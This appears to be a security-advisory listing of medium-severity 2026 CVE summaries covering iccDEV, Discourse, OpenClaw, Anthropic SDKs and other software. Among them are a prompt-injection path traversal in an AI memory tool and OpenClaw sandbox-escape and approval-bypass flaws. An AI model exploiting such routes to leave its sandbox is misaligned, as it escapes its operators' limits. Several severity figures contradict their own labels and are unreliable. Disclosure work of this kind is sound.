Heap Overflow Buffer Overflow
CVE-2026-34539 MEDIUM CVSS 6.2
Heap buffer overflow in iccDEV's CTiffImg::WriteLine() function allows local attackers to crash the iccSpecSepToTiff tool via specially crafted ICC color profile and TIFF file pairs. Versions prior to 2.3.1.6 are vulnerable; the attack requires no authentication or user interaction beyond processing a malicious file. While the current impact is limited to denial of service, heap overflows can potentially enable memory corruption exploitation depending on heap layout and attacker sophistication.

Heap Overflow Buffer Overflow
CVE-2026-34537 MEDIUM CVSS 6.2
Local denial of service in iccDEV prior to version 2.3.1.6 allows unauthenticated local attackers to crash applications processing ICC color profiles by crafting malicious profiles that trigger undefined behavior through invalid enum values in CIccOpDefEnvVar::Exec(). The vulnerability requires local file access but no privilege escalation, with an EPSS score of 6.2 reflecting moderate real-world risk. No public exploit code or active exploitation has been identified at the time of analysis.

Information Disclosure
CVE-2026-34536 MEDIUM CVSS 6.2
Stack overflow in iccDEV's SIccCalcOp::ArgsUsed() function allows local attackers to trigger a denial of service by supplying a crafted ICC color profile to iccApplyProfiles. The vulnerability affects iccDEV versions prior to 2.3.1.6 and requires no authentication or user interaction; exploitation manifests as application crash during calculator argument computation. No public exploit code or active exploitation has been identified at time of analysis.

Denial Of Service
CVE-2026-34535 MEDIUM CVSS 6.2
Malformed ICC color profile files trigger a heap buffer overflow in iccDEV versions prior to 2.3.1.6, causing denial of service through segmentation fault in the CIccTagArray::Cleanup() function. Local attackers can exploit this vulnerability by crafting a malicious ICC profile that, when processed by iccRoundTrip or similar tools, crashes the application due to misaligned pointer access. No public exploit code has been identified, and this vulnerability is not confirmed as actively exploited in the wild.

Heap Overflow Buffer Overflow
CVE-2026-34534 MEDIUM CVSS 6.2
Heap buffer overflow in iccDEV prior to version 2.3.1.6 allows local attackers to trigger a denial of service via a malicious ICC color profile, causing out-of-bounds heap reads in the CIccMpeSpectralMatrix::Describe() function when processing profiles with iccDumpProfile. The vulnerability requires local file access but no user interaction or authentication, with confirmed patch availability in version 2.3.1.6.

Heap Overflow Buffer Overflow
CVE-2026-34533 MEDIUM CVSS 6.2
Undefined Behavior in iccDEV prior to version 2.3.1.6 allows local attackers to cause a denial of service by supplying a crafted ICC color profile containing invalid enum values for icChannelFuncSignature, which triggers an application crash during profile processing in CIccCalculatorFunc::ApplySequence(). The vulnerability requires local file access or the ability to provide a malicious ICC profile to an application using the library; no public exploit code has been identified.

Information Disclosure
CVE-2026-34531 MEDIUM CVSS 6.5
Flask-HTTPAuth versions prior to 4.8.1 allow authentication bypass when applications store empty string tokens in their user database, enabling unauthenticated attackers to authenticate as any user with an empty token set by submitting requests without a token or with an empty token value. This affects only token-based authentication mechanisms that verify tokens via database lookup rather than cryptographic means (e.g., JWTs). CVSS score 6.5 reflects moderate integrity impact with low computational attack complexity, and no public exploit code has been identified at the time of analysis.

Python Authentication Bypass
CVE-2026-34530 MEDIUM CVSS 6.9
Stored cross-site scripting in File Browser via admin-controlled branding fields allows injection of persistent JavaScript that executes for all visitors, including unauthenticated users. The vulnerability stems from use of Go's text/template (which performs no HTML escaping) instead of html/template when rendering the SPA index.html with branding data. An authenticated admin can inject malicious payloads into branding.name or branding.color fields that break out of their intended HTML context and execute arbitrary JavaScript in every user's browser without restriction, as no Content-Security-Policy header is set. Affected versions through v2.62.1 are vulnerable; vendor-released patches are available.

XSS Python Docker
CVE-2026-34508 MEDIUM CVSS 6.3
OpenClaw before version 2026.3.12 allows authenticated attackers to bypass rate limiting on webhook secret validation by exploiting a logic flaw that applies rate limits only after successful authentication, enabling brute-force attacks against webhook credentials and injection of forged Zalo webhook traffic. The vulnerability requires authenticated access but results in high-confidence credential compromise.

Authentication Bypass
CVE-2026-34505 MEDIUM CVSS 6.9
Webhook secret brute-forcing in OpenClaw before 2026.3.12 enables attackers to forge authenticated webhooks by exploiting pre-authentication rate limit bypass. Unauthenticated remote attackers can systematically guess webhook secrets without triggering rate limiting (which only applies post-authentication), then submit forged webhook payloads to compromise system integrity and confidentiality. CVSS 9.8 (Critical) with network attack vector and no authentication required. No public exploit identified at time of analysis, though exploitation requires only standard HTTP tooling. EPSS data not available; exploitation appears automatable given the straightforward nature of brute-force attacks against webhook endpoints.

Authentication Bypass
CVE-2026-34504 MEDIUM CVSS 6.9
Server-side request forgery in OpenClaw before 2026.3.28 allows unauthenticated remote attackers to fetch internal URLs through unguarded image download operations in the fal provider image-generation-provider.ts component, enabling exposure of internal service metadata and responses via the image pipeline. CVSS 5.3 indicates moderate integrity impact without authentication requirements. No public exploit code or active exploitation confirmed at time of analysis.

SSRF
CVE-2026-34452 MEDIUM CVSS 5.8
Symlink race condition in Anthropic Python SDK async filesystem memory tool (versions 0.86.0-0.86.x) allows local authenticated attackers to escape sandbox restrictions and read or write arbitrary files outside the designated memory directory. The vulnerability exploits a time-of-check-time-of-use (TOCTOU) flaw where path validation occurs before symlink resolution, enabling an attacker with memory directory write access to redirect file operations via symlink manipulation. The synchronous implementation is unaffected. Vendor-released patch: version 0.87.0.

Python Information Disclosure
CVE-2026-34451 MEDIUM CVSS 6.3
Path traversal vulnerability in Anthropic Claude SDK for TypeScript (versions 0.79.0-0.80.x) allows remote attackers to read and write files outside the intended sandboxed memory directory via prompt injection. The vulnerability exploits incomplete path validation in the local filesystem memory tool, where a model supplied with crafted input can reference sibling directories sharing the memory root's name prefix. Patch available in version 0.81.0; no public exploit code or active exploitation confirmed, but the attack surface is exposed to any application using the affected SDK versions with model-supplied file paths.

Path Traversal
CVE-2026-34450 MEDIUM CVSS 4.8
Anthropic Python SDK versions 0.86.0 to before 0.87.0 create memory files with overly permissive file permissions (0o666), allowing local attackers to read persisted agent state or modify memory files to influence model behavior on shared hosts and Docker environments. The vulnerability affects both synchronous and asynchronous memory tool implementations and has been patched in version 0.87.0; no public exploit code or active exploitation has been identified at the time of analysis.

Python Privilege Escalation Docker
CVE-2026-34443 MEDIUM CVSS 6.9
FreeScout prior to version 1.8.211 fails to validate Server-Side Request Forgery (SSRF) protections due to a flawed IP range check in checkIpByMask() that only accepts CIDR notation and rejects plain IP addresses, leaving the entire 10.0.0.0/8 and 172.16.0.0/12 private IP ranges unprotected from SSRF attacks. Remote attackers can exploit this logic error to access internal services and resources on private networks that the application can reach, potentially escalating to information disclosure or further lateral movement. The vulnerability is confirmed patched in version 1.8.211.

PHP SSRF
CVE-2026-34442 MEDIUM CVSS 5.4
Host header manipulation in FreeScout prior to version 1.8.211 allows unauthenticated remote attackers to inject arbitrary domains into application-generated absolute URLs, enabling open redirects and external resource loading attacks. The vulnerability exploits unvalidated Host header values to construct malicious links and asset references, potentially redirecting users to attacker-controlled domains or loading external resources from compromised servers. CVSS 5.4 reflects low-to-moderate real-world risk given the requirement for user interaction (UI:R), though no active exploitation has been publicly confirmed.

Open Redirect
CVE-2026-34441 MEDIUM CVSS 4.8
HTTP Request Smuggling in cpp-httplib prior to 0.40.0 allows remote attackers to inject arbitrary HTTP requests on HTTP/1.1 keep-alive connections by embedding malicious request data in the body of GET requests that the static file handler does not consume. The unread body bytes remain on the TCP stream and are interpreted as a new request, enabling information disclosure and request manipulation without authentication or user interaction.

Request Smuggling Information Disclosure
CVE-2026-34405 MEDIUM CVSS 6.1
Nuxt OG Image versions prior to 6.2.5 allow cross-site scripting (XSS) attacks via arbitrary HTML attribute injection in the image-generation endpoint at /_og/d/, affecting any unauthenticated remote user who can craft a malicious URI. An attacker can inject attributes into the HTML page body to execute JavaScript in the context of users' browsers, compromising confidentiality and integrity without service disruption. No public exploit code or active exploitation has been confirmed at the time of analysis.

XSS
CVE-2026-34404 MEDIUM CVSS 6.9
Nuxt OG Image versions prior to 6.2.5 are vulnerable to denial of service through unbounded image dimension parameters in the /_og/d/ endpoint. Attackers can specify arbitrarily large width and height values, causing the image-generation component to consume excessive CPU and memory resources, resulting in application unavailability. No authentication is required to exploit this vulnerability.

Denial Of Service
CVE-2026-34401 MEDIUM CVSS 6.5
XML Notepad versions prior to 2.9.0.21 allow remote attackers to leak local file contents or capture NTLM credentials via crafted XML files with malicious DTDs, exploiting disabled-by-default DTD processing that automatically resolves external entities. The vulnerability requires user interaction (opening a malicious XML file) but poses significant confidentiality risk on Windows systems where NTLM credential interception is feasible. Microsoft released patched version 2.9.0.21 to address this XXE (XML External Entity) issue.

Microsoft XXE
CVE-2026-34400 MEDIUM CVSS 6.9
SQL injection in Alerta's Query string search API (q= parameter) allows unauthenticated remote attackers to execute arbitrary SQL commands against the underlying PostgreSQL database. The vulnerability stems from unsafe f-string interpolation of user-supplied search terms directly into SQL WHERE clauses without parameterization. Alerta versions prior to 9.1.0 are affected; the vulnerability has been patched in version 9.1.0 with no public exploit code identified at time of analysis.

PostgreSQL SQLi
CVE-2026-34396 MEDIUM CVSS 6.1
Stored cross-site scripting (XSS) in WWBN AVideo 26.0 and prior allows unauthenticated attackers to inject malicious JavaScript into plugin configuration values via CSRF, or authenticated admins to directly inject code that executes in administrator browsers when accessing plugin configuration pages. The vulnerability exploits missing output encoding in the jsonToFormElements() function, enabling arbitrary JavaScript execution within the admin panel with impact to confidentiality and integrity.

XSS PHP CSRF
CVE-2026-34395 MEDIUM CVSS 6.5
Information disclosure in WWBN AVideo versions 26.0 and prior allows authenticated users to enumerate and dump the complete user database including personal information and wallet balances via the /plugin/YPTWallet/view/users.json.php endpoint. The vulnerability stems from inadequate authorization checks that verify user login status but fail to enforce administrator-only access, enabling any registered account holder to retrieve sensitive data belonging to all platform users. No public exploit code or active exploitation has been confirmed at time of analysis, and vendor patches are not yet available.

Authentication Bypass PHP
CVE-2026-34384 MEDIUM CVSS 4.5
Admidio prior to version 5.0.8 allows attackers with pending registration status to bypass CSRF protections and trick administrators with approval rights into automatically approving registrations via malicious URLs, enabling unauthorized account activation without manual review. The vulnerability affects the create_user, assign_member, and assign_user action modes in modules/registration.php, which process GET requests without token validation unlike the delete_user mode in the same file. An attacker extracts their user UUID from a registration confirmation email, crafts a URL targeting administrators, and gains illicit account approval through social engineering rather than technical compromise.

PHP CSRF
CVE-2026-34383 MEDIUM CVSS 4.3
Admidio versions prior to 5.0.8 allow authenticated users to bypass CSRF token validation and server-side form validation in the inventory module's item_save endpoint by setting the imported POST parameter to true, enabling unauthorized modification of inventory item data without proper security checks. The vulnerability requires valid authentication but carries moderate impact due to the complete circumvention of two independent security controls.

CSRF
CVE-2026-34382 MEDIUM CVSS 4.6
Admidio 5.0.0 through 5.0.7 allows authenticated users to permanently delete list configurations via CSRF attacks in the mylist_function.php delete handler, lacking CSRF token validation. An attacker can craft a malicious page to silently destroy a victim's shared list configurations, including organization-wide lists if the victim holds administrator rights. No public exploit code has been identified at time of analysis. Vendor-released patch: version 5.0.8.

PHP CSRF
CVE-2026-34235 MEDIUM CVSS 6.9
Heap out-of-bounds read in PJSIP's VP9 RTP unpacketizer allows remote attackers to read memory beyond allocated buffer boundaries by sending crafted VP9 Scalability Structure data, potentially disclosing sensitive information. PJSIP versions prior to 2.17 are affected. The vulnerability requires network access but no authentication, authentication complexity, or user interaction, with CVSS score of 6.9 indicating moderate severity driven by availability impact. Vendor-released patch available in version 2.17.

Information Disclosure Buffer Overflow
CVE-2026-34227 MEDIUM CVSS 5.9
Unauthenticated attackers can hijack all active Sliver C2 sessions and beacons through a single malicious link clicked by an operator, gaining immediate silent control to exfiltrate collected intelligence or destroy compromised infrastructure, prior to version 1.7.4. The vulnerability exploits browser-based interaction with the custom Wireguard netstack, bypassing authentication entirely via a user-interaction attack vector. This is a critical supply-chain risk for red teams and penetration testers relying on Sliver for command-and-control operations.

Authentication Bypass
CVE-2026-34218 MEDIUM CVSS 6.3
ClearanceKit on macOS fails to enforce managed and user-defined file-access policies during startup, allowing local processes to bypass intended access controls until GUI interaction triggers policy reloading. The vulnerability affects ClearanceKit versions prior to 4.2.14, where two startup defects create a window in which only a hardcoded baseline rule is enforced, leaving the system vulnerable to privilege escalation and unauthorized file access. This issue is not confirmed actively exploited, but the trivial attack vector (local, no authentication) and high integrity/system impact make it a meaningful risk for systems relying on ClearanceKit for file-access enforcement.

Apple Privilege Escalation
CVE-2026-34206 MEDIUM CVSS 6.1
Reflected cross-site scripting (XSS) in Captcha Protect versions prior to 1.12.2 allows unauthenticated remote attackers to inject arbitrary script into the anti-bot challenge page by supplying a crafted destination parameter. The vulnerability exploits unsafe use of Go's text/template library, which does not perform contextual HTML escaping, enabling attackers to break out of HTML attributes and execute malicious code in the context of users viewing the challenge page. This affects all Traefik middleware deployments using vulnerable versions of libops/captcha-protect.

XSS
CVE-2026-33580 MEDIUM CVSS 6.3
Brute-force attacks against OpenClaw webhook authentication allow unauthenticated remote attackers to forge Nextcloud Talk webhook events by exploiting missing rate limiting on shared secret validation. Affecting OpenClaw versions prior to 2026.3.28, attackers can repeatedly attempt authentication without throttling to compromise weak shared secrets and inject malicious webhook payloads. CVSS 9.8 critical severity reflects network-accessible attack surface requiring no authentication. No public exploit identified at time of analysis, though EPSS data not available. Vendor-released patch available via commit e403decb6e20091b5402780a7ccd2085f98aa3cd.

Information Disclosure
CVE-2026-33578 MEDIUM CVSS 5.3
Authorization policy bypass in OpenClaw messaging extensions allows unauthenticated remote attackers to circumvent sender allowlist restrictions and interact with bots without authorization. The vulnerability affects OpenClaw versions prior to 2026.3.28, specifically impacting Google Chat and Zalouser extensions where route-level group allowlist policies silently downgrade to open policy during resolution. With CVSS 9.8 (critical severity, network-accessible, no authentication required) and EPSS data unavailable, this represents a significant access control failure. No public exploit identified at time of analysis, though the attack complexity is low and requires no user interaction.

Authentication Bypass Google
CVE-2026-33576 MEDIUM CVSS 6.9
Unauthenticated attackers can force OpenClaw versions before 2026.3.28 to download and store arbitrary media files through Zalo messaging channels, bypassing sender authorization checks. The flaw allows remote exploitation without authentication (CVSS 9.8 critical) to consume network bandwidth and storage resources. No public exploit identified at time of analysis, though the attack vector is straightforward given the lack of pre-validation authorization checks. Vendor-released patch available via commit 68ceaf7a5.

Authentication Bypass
CVE-2026-33415 MEDIUM CVSS 5.1
Discourse versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-beta allow authenticated moderators to bypass category permission controls and retrieve post content, topic titles, and usernames from categories they lack authorization to access via a sentiment analytics endpoint. Patches are available (2026.1.3, 2026.2.2, 2026.3.0); no public exploit code or active exploitation has been identified.

Authentication Bypass
CVE-2026-33300 MEDIUM CVSS 5.3
Discourse 2026.1.0 through 2026.3.0-beta allows authenticated moderators to bypass authorization controls in the Category Chatables Controller, disclosing sensitive information about hidden group names and user counts. The vulnerability affects multiple release branches and has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0. With a CVSS score of 5.3 and low attack complexity, this represents a meaningful information disclosure risk requiring prompt patching.

Information Disclosure
CVE-2026-33185 MEDIUM CVSS 5.3
Server-side request forgery (SSRF) in Discourse group email settings test endpoint allows authenticated non-staff group owners to initiate outbound connections to arbitrary hosts and ports, enabling internal network reconnaissance. Affects Discourse 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-rc versions. Patched in 2026.1.3, 2026.2.2, and 2026.3.0. No public exploit code or active exploitation confirmed at time of analysis.

SSRF
CVE-2026-33074 MEDIUM CVSS 6.3
Discourse versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-pre allow authenticated users to escalate their subscription tier by purchasing a lower-cost plan while obtaining benefits reserved for higher-tier subscriptions. The vulnerability has a CVSS 6.3 score reflecting the integrity impact, requires high attack complexity and partial timing conditions, but affects confidentiality minimally. Vendor-released patches address the flaw in versions 2026.1.3, 2026.2.2, and 2026.3.0, and the exploit likely requires knowledge of the subscription grant mechanism.

Privilege Escalation
CVE-2026-32988 MEDIUM CVSS 5.8
Sandbox escape in OpenClaw (before version 2026.3.11) allows local authenticated users to write arbitrary files outside validated directories via a TOCTOU race condition during staged file writes. The fs-bridge component fails to anchor temporary file operations to verified parent directories, enabling attackers to manipulate path aliases between validation and execution phases. CVSS 7.5 (High) reflects the local attack vector with high complexity, but scope change (S:C) indicates potential container/sandbox breakout. No public exploit identified at time of analysis, though the race condition vulnerability class (CWE-367) is well-understood by attackers.

Authentication Bypass
CVE-2026-32977 MEDIUM CVSS 5.8
OpenClaw before 2026.3.11 allows authenticated local attackers to bypass sandbox boundaries and write files outside validated paths via a time-of-check-time-of-use race condition in the fs-bridge writeFile commit operation. An attacker with local access and sufficient privileges can exploit unanchored container paths during file move operations to redirect committed files outside the sandbox, achieving arbitrary file write capabilities within the container mount namespace. No public exploit code or active exploitation has been confirmed.

Authentication Bypass
CVE-2026-32951 MEDIUM CVSS 4.3
Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and 2026.3.0 prior to patching allow authenticated users to disclose shared draft topic titles via specially crafted inline onebox requests that reference the shared drafts category. An attacker with valid Discourse credentials can enumerate and read draft titles not intended for their access, violating information confidentiality. The vulnerability has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0; EPSS and KEV data indicate no current active exploitation, though the fix is available and should be deployed promptly given the low barrier to exploitation.

Information Disclosure
CVE-2026-32921 MEDIUM CVSS 5.3
OpenClaw before 2026.3.8 allows authenticated remote attackers to bypass approval controls in the system.run function by obtaining approval for a script, modifying the approved script file before execution, and executing malicious content while preserving the approved command structure. This approval-execution window vulnerability enables privilege escalation and code execution with low complexity and no user interaction required. No public exploit code or active exploitation has been confirmed at the time of analysis.

Authentication Bypass
CVE-2026-32629 MEDIUM CVSS 5.4
Stored cross-site scripting (XSS) in phpMyFAQ 4.2.0-alpha allows unauthenticated attackers to inject malicious JavaScript via RFC 5321-compliant quoted email addresses in guest FAQ submissions. The injected payload is stored without sanitization and rendered using Twig's |raw filter in the admin FAQ editor, executing in administrator browsers and enabling session hijacking, admin account takeover, and arbitrary site manipulation. A publicly available proof-of-concept demonstrates successful JavaScript execution when administrators review pending FAQs.

PHP RCE Nginx Docker
CVE-2026-32620 MEDIUM CVSS 5.3
Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and 2026.3.0 leak read receipt metadata (who read staff-only posts and when) to non-staff users who should not have access to that information. While no post content is exposed, the metadata disclosure violates intended access controls. Patches are available in versions 2026.1.3, 2026.2.2, and 2026.3.0.

Information Disclosure
CVE-2026-32619 MEDIUM CVSS 6.3
Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and 2026.3.0-beta retain unauthorized poll interaction capabilities for users who have lost access to private topics, allowing them to vote on and toggle poll status despite removal from category group membership. While no topic content is exposed, the vulnerability permits state modification in topics to which access should have been revoked, violating the intended access control model. Patched versions 2026.1.3, 2026.2.2, and 2026.3.0 are available, and no public exploit code has been identified.

Authentication Bypass
CVE-2026-32618 MEDIUM CVSS 4.3
Discourse chat user search functionality discloses channel membership information to authenticated users without proper authorization checks, allowing users to infer private channel membership across versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-rc1, affecting community administrators and organizations relying on channel privacy. The vulnerability requires authenticated access but carries low confidentiality impact (CVSS 4.3); patches are available in versions 2026.1.3, 2026.2.2, and 2026.3.0.

Information Disclosure
CVE-2026-32615 MEDIUM CVSS 5.3
Category group moderators in Discourse versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-pre can perform privileged actions (such as topic moderation) on content within private categories to which they lack read access, bypassing intended access controls. This authenticated privilege escalation affects self-hosted and managed Discourse instances and has been resolved in versions 2026.1.3, 2026.2.2, and 2026.3.0+. No public exploit code or active exploitation has been reported at this time.

Authentication Bypass
CVE-2026-32273 MEDIUM CVSS 5.4
Stored cross-site scripting (XSS) in Discourse category description API endpoints allows authenticated users with category management privileges to inject malicious scripts that execute in the browsers of other users viewing the category. The vulnerability affects Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and 2026.3.0-pre-release due to missing input sanitization on category description updates. Vendor-released patches address this in versions 2026.1.3, 2026.2.2, and 2026.3.0; no public exploit code has been identified at time of analysis.

XSS
CVE-2026-32243 MEDIUM CVSS 5.3
Stored cross-site scripting (XSS) in Discourse allows authenticated users with conversation creation privileges to inject arbitrary HTML and JavaScript via crafted AI conversation titles, executing malicious payloads in the browsers of users viewing onebox previews and potentially enabling session hijacking or unauthorized actions. Affects Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and 2026.3.0-beta; patched versions 2026.1.3, 2026.2.2, and 2026.3.0 are available. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS
CVE-2026-32143 MEDIUM CVSS 5.3
Discourse moderators can export CSV data from admin-restricted reports in versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-beta, circumventing role-based access controls and exposing sensitive operational data intended exclusively for administrators. The vulnerability requires authenticated moderator access but carries low confidentiality impact (CVSS 5.3). Vendor-released patches are available in Discourse 2026.1.3, 2026.2.2, and 2026.3.0.

Information Disclosure
CVE-2026-32113 MEDIUM CVSS 5.1
Open redirect vulnerability in Discourse versions 2026.1.0 through 2026.3.0 allows unauthenticated remote attackers to redirect users to arbitrary destinations via a malicious sso_destination_url cookie, exploiting a lack of URL validation in the StaticController enter action. While the cookie is normally set during legitimate DiscourseConnect Provider flows with cryptographic validation, attackers can directly set client-controlled cookies to bypass validation logic. The vulnerability requires user interaction (clicking a crafted link) and persistence of attacker-controlled cookies to exploit, but successful exploitation can be used for credential harvesting or phishing attacks. No public exploit code or active exploitation has been confirmed at time of analysis. Patched versions 2026.1.3, 2026.2.2, and 2026.3.0 are available.

Open Redirect
CVE-2026-30879 MEDIUM CVSS 6.9
Cross-site scripting (XSS) vulnerability in baserCMS prior to version 5.2.3 allows attackers to inject malicious scripts into blog posts, potentially enabling session hijacking, credential theft, or malware distribution to site visitors. The vulnerability affects the blog post functionality and has been patched in version 5.2.3; no public exploit code or active exploitation has been confirmed at time of analysis.

XSS
CVE-2026-30878 MEDIUM CVSS 5.3
baserCMS versions prior to 5.2.3 allow unauthenticated remote attackers to bypass administrative form submission controls via a public mail API, enabling arbitrary form submissions even when the form is configured to reject new entries. This authentication bypass has a CVSS score of 5.3 and permits attackers to inject spam or abuse content without authorization, circumventing intended intake restrictions. Vendor-released patch available in version 5.2.3.

Authentication Bypass
CVE-2026-30521 MEDIUM CVSS 6.5
SourceCodester Loan Management System v1.0 allows authenticated administrators to create loan plans with negative interest rates by submitting negative values in HTTP POST requests, bypassing client-side validation that lacks server-side enforcement. This business logic vulnerability enables attackers with administrative credentials to manipulate loan terms and potentially cause financial harm to the organization. Publicly available exploit code exists demonstrating the attack.

Authentication Bypass
CVE-2026-30520 MEDIUM CVSS 5.4
Blind SQL injection in SourceCodester Loan Management System v1.0 allows authenticated attackers to inject malicious SQL commands via the borrower_id parameter in the ajax.php save_loan action. The vulnerability requires valid authentication to exploit and publicly available proof-of-concept code exists, making this a moderate-risk issue for organizations using this open-source application despite the lack of CVSS scoring.

SQLi PHP
CVE-2026-30280 MEDIUM CVSS 5.3
Arbitrary file overwrite vulnerability in RAREPROB SOLUTIONS PRIVATE LIMITED Video player Play All Videos v1.0.135 enables remote attackers to overwrite critical internal files during the file import process, resulting in arbitrary code execution or information disclosure. No CVSS score, exploitation data, or vendor patch information is currently available; the vulnerability was disclosed via academic research channels rather than coordinated vendor notification.

File Upload RCE Information Disclosure
CVE-2026-27854 MEDIUM CVSS 4.8
DNSdist instances using custom Lua code can be crashed via denial of service when the DNSQuestion:getEDNSOptions method accesses a modified DNS packet, triggering a use-after-free condition. This affects DNSdist across all versions and requires network access to send crafted DNS queries, but the attack demands specific Lua code patterns and high attack complexity; no public exploit or active exploitation has been confirmed, and the real-world impact is limited to environments where custom Lua DNS query handlers reference EDNS options.

Use After Free Denial Of Service Memory Corruption
CVE-2026-27853 MEDIUM CVSS 5.9
DNSdist fails to validate packet size bounds when rewriting DNS questions or responses via Lua methods (DNSQuestion:changeName, DNSResponse:changeName), allowing unauthenticated remote attackers to craft DNS responses that trigger out-of-bounds writes and exceed the 65535-byte DNS packet size limit, resulting in denial of service via crash. CVSS 5.9 (high availability impact); no public exploit code identified at time of analysis.

Buffer Overflow Denial Of Service Memory Corruption
CVE-2026-27697 MEDIUM CVSS 6.9
SQL injection in baserCMS prior to version 5.2.3 allows unauthenticated remote attackers to execute arbitrary SQL queries through unvalidated input in blog post functionality. The vulnerability affects all versions before 5.2.3 and has been patched; no public exploit code or active exploitation has been confirmed at the time of analysis.

SQLi
CVE-2026-24153 MEDIUM CVSS 5.2
Information disclosure in NVIDIA Jetson Linux affects Xavier, Orin, and Thor series devices due to the nvluks trusted application remaining enabled in initrd. A local attacker with physical access and low-level privileges can exploit this to read sensitive data from the device, as confirmed by CWE-501 (CLS: Malicious Code Not Included in Executable) indicating improper access control to privileged components. CVSS 5.2 reflects the high confidentiality impact but requires physical attack vector and authenticated access; no public exploit or CISA KEV status reported.

Information Disclosure Nvidia
CVE-2026-24030 MEDIUM CVSS 5.3
Memory exhaustion in DNSdist allows remote, unauthenticated attackers to trigger denial of service by crafting malicious DNS over QUIC or DNS over HTTP/3 payloads that force excessive memory allocation. The attack causes the QUIC connection to close abnormally, and in systems with limited memory reserves, can force out-of-memory conditions that terminate the DNSdist process entirely.

Denial Of Service
CVE-2026-24029 MEDIUM CVSS 6.5
PowerDNS dnsdist allows unauthenticated DNS over HTTPS (DoH) queries to bypass access control lists when the early_acl_drop option is disabled on nghttp2 frontends, exposing the DNS resolver to unauthorized query submission and potential information disclosure. Affected versions include dnsdist across multiple releases where this configuration weakness exists; the vulnerability has a CVSS score of 6.5 and exposes both confidentiality and integrity concerns despite not affecting availability.

Authentication Bypass
CVE-2026-24028 MEDIUM CVSS 5.3
Out-of-bounds read in PowerDNS dnsdist allows unauthenticated remote attackers to trigger denial of service or potential information disclosure by sending a crafted DNS response packet when custom Lua code uses the newDNSPacketOverlay function to parse packets. CVSS 5.3 indicates moderate severity with network-accessible attack surface and no privilege or user interaction required.

Denial Of Service Information Disclosure Buffer Overflow
CVE-2026-22569 MEDIUM CVSS 5.4
Zscaler Client Connector on Windows contains an incorrect startup configuration that permits limited traffic to bypass inspection under rare circumstances, resulting in potential information disclosure and integrity compromise. The vulnerability affects all versions of the product and requires user interaction to exploit, with a CVSS score of 5.4 reflecting the combination of network-based attack vector, low complexity, and low impact on confidentiality and integrity. No evidence of active exploitation or public exploit code has been identified.

Information Disclosure Microsoft
CVE-2026-22561 MEDIUM CVSS 4.7
DLL search-order hijacking in Anthropic Claude for Windows installer (Claude Setup.exe) versions before 1.1.3363 enables local privilege escalation to system context. An attacker with low privileges and physical or local access can plant a malicious DLL (such as profapi.dll) in the installer directory; when an elevated user runs the installer, the uncontrolled search path causes the malicious DLL to be loaded and executed with system privileges, achieving arbitrary code execution. No public exploit code or active exploitation has been confirmed at the time of analysis.

Privilege Escalation RCE Microsoft
CVE-2026-5237 MEDIUM CVSS 6.9
SQL injection in itsourcecode Payroll Management System 1.0 allows remote unauthenticated attackers to manipulate the ID parameter in /manage_user.php, enabling arbitrary SQL query execution with confidentiality and integrity impact. The vulnerability has a publicly available exploit, making it immediately actionable for threat actors despite the moderate CVSS score.

SQLi PHP
CVE-2026-5236 MEDIUM CVSS 4.8
Heap-based buffer overflow in Axiomatic Bento4 up to version 1.6.0-641 allows local authenticated attackers to cause a denial of service or potentially corrupt memory via the AP4_BitReader::SkipBits function in the DSI v1 Parser component when processing a maliciously crafted n_presentations argument. Public exploit code is available; vendor has not responded to early disclosure.

Buffer Overflow
CVE-2026-5235 MEDIUM CVSS 4.8
Heap-based buffer overflow in Axiomatic Bento4 up to version 1.6.0-641 affects the AP4_BitReader::ReadCache function in the MP4 file parser component, allowing local attackers with limited privileges to cause information disclosure, integrity violation, and denial of service. Publicly available exploit code exists, and the vendor has not yet responded to the early disclosure despite project notification through GitHub issue tracking.

Heap Overflow Buffer Overflow
CVE-2026-5215 MEDIUM CVSS 5.3
Improper access controls in D-Link DNS and DNR network-attached storage devices allow unauthenticated remote attackers on adjacent networks to access IPv6 configuration functions via the cgi_get_ipv6 function in /cgi-bin/network_mgr.cgi, potentially disclosing sensitive network configuration information. The vulnerability affects multiple D-Link models up to firmware version 20260205, publicly available exploit code exists, and the attack requires only network adjacency with low complexity.

D-Link Authentication Bypass
CVE-2026-5210 MEDIUM CVSS 6.9
Remote file inclusion in SourceCodester Leave Application System 1.0 allows unauthenticated attackers to manipulate the page parameter and access arbitrary files, resulting in information disclosure. The CVSS 4.0 score of 6.9 reflects low confidentiality impact with network-based attack vector and no user interaction required. Publicly available exploit code exists, increasing practical risk despite the moderate CVSS rating.

Information Disclosure
CVE-2026-5209 MEDIUM CVSS 4.8
Stored cross-site scripting (XSS) in SourceCodester Leave Application System 1.0 User Management Handler allows authenticated remote attackers with high privileges to inject malicious scripts via the component, requiring user interaction to execute. The vulnerability carries a CVSS 4.8 score with publicly available exploit code; however, real-world risk is constrained by high privilege requirement (PR:H) and necessary user interaction (UI:P), limiting opportunistic exploitation.

XSS
CVE-2026-5206 MEDIUM CVSS 5.3
SQL injection in code-projects Simple Gym Management System 1.0 Payment Handler allows authenticated remote attackers to manipulate Payment_id, Amount, customer_id, payment_type, and customer_name parameters to execute arbitrary SQL queries, potentially leading to unauthorized data access or modification. Publicly available exploit code exists for this vulnerability; patch status from vendor remains unconfirmed.

SQLi
CVE-2026-5205 MEDIUM CVSS 5.3
Server-side request forgery (SSRF) in Chatwoot up to version 4.11.2 allows authenticated remote attackers to manipulate the URL argument in the Webhooks::Trigger function, enabling arbitrary HTTP requests from the server. Publicly available exploit code exists, and the vendor has not responded to disclosure efforts. While CVSS is moderate (5.3), the presence of public POC and authenticated attack vector creates a meaningful exploitation risk for deployed instances.

SSRF
CVE-2026-5203 MEDIUM CVSS 5.1
